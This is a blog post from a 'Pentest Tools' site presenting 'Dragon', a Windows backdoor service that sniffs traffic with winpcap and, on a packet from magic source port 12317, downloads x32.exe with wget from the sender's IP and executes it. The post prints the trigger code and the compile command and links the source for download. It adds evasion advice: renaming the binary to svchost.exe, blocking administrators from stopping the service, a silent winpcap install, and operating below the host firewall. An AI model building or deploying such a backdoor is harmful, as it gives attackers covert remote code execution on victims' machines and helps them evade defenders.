Pentest Tools

Published on June 14th, 2015 📆 | 7237 Views ⚑


Windows Backdoor: Dragon — a sniffing, non binding, reverse down/exec, portknocking service
Compiles as a windows service. Once installed & started, it’ll listen (using winpcap) to all interfaces on the machine. If a packet comes across with the “magic source port”, it’ll reach out using wget to download and execute a binary based off of the src ip of the senders packet.

Dragon is a windows app that is designed to be installed as a windows service and will run at windows boot. It will listen to the first interface available to the OS (if you have multiple interfaces, this will only listen on the first one).  It will continuously listen to all traffic across this interface, and discard ALL packets its not interested in.

[adsense size='1']

If a packet comes in with the Source Port of 12317, it will execute the following:

if (sport == 12317) { //Change this if you want it to listen on a different port.
    remove( "c:\\windows\\system32\\x32.exe" );
    char cmd[255];
    sprintf(cmd, "\"c:\\windows\\system\\wget.exe https://%d.%d.%d.%d/x32.exe\"", ih->saddr.byte1, ih->saddr.byte2, ih->saddr.byte3, ih->saddr.byte4 );

First it will remove any file stored under c:\windows\system32\ called x32.exe.  Next using wget.exe (you’ll need to install this on your own).  It will download x32.exe from a host where the magic happy packet was sent from.  This means that even if the blue team firewalls off your attacking server, just change your IP, and send your happy magic packet from your new IP. It’ll still work. Finally, it’ll execute it.  Note that we are using system() to call our binary.  Doing this means that the service will wait until the execution of x32.exe has finished before listening again for more happy packets.  Lastly, name of the exe and source port as a preference – if you’d like to use something else, just modify it in this function, the rest of the code can remain untouched. As it stands, the “magic source port” is 12317. To change this, you can modify the option listed in the accepted source port in the function “packet_handler”. Heck you could put what ever you wanted here, shellcode to be executed, windows commands like add users to local administrator, etc.  Its pretty modular, I just wanted the ability to download and execute when needed.

Other things to note…  This windows service employs the following code:

ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_SHUTDOWN;
[adsense size='1']

The ServiceStatus.dwControlsAccepted is the value which tells the service, what states it’ll accept from the user.  Right now its set to only accept termination when being told that the system is shutting down.  This means the user can not pause or start the service, even if they are Administrator.  The only way to kill/stop it, is by using task manager to kill the process.  To help blend in even further, it is recommend to rename dragon.exe to svchost.exe :).



  1. This runs at a layer that is lower than the host firewall.
  2. This exe does require that libpcap driver be installed on the victims machine.  A reboot is NOT needed for this, but a silent install of winpcap is recommended.
  3. This code will compile (use  MinGW) for both 32-bit and 64-bit executables.  It has been successfully run on:
    1. Windows XP 32 bit
    2. Windows 7 32 bit
    3. Windows 7 64 bit
    4. Windows 8 64 bit
    5. Windows 2000 server 32 bit (for fun)
    6. Windows 2003 server 32 bit
    7. Windows 2012 Server 64 bit
  4. It does not work for IPv6 networks because…ew.

[adsense size='1']


git clone

To compile use MinGW’s version of gcc.

You will need to have installed or reference the path to the libpcap and WpdPack Libraries.

gcc.exe -v -I c:\Path\To\WpdPack\Include -L c:\Path\To\WpdPack\lib dragon.c -L/usr/local/lib -lwpcap -lws2_32 -static -o dragon.exe
Note: This has been tested and works under both 32 and 64 bit versions of windows ranging from XP – Win8 and Server 2k3 to Server2k12.


Source && Download

Tagged with:

Comments are closed.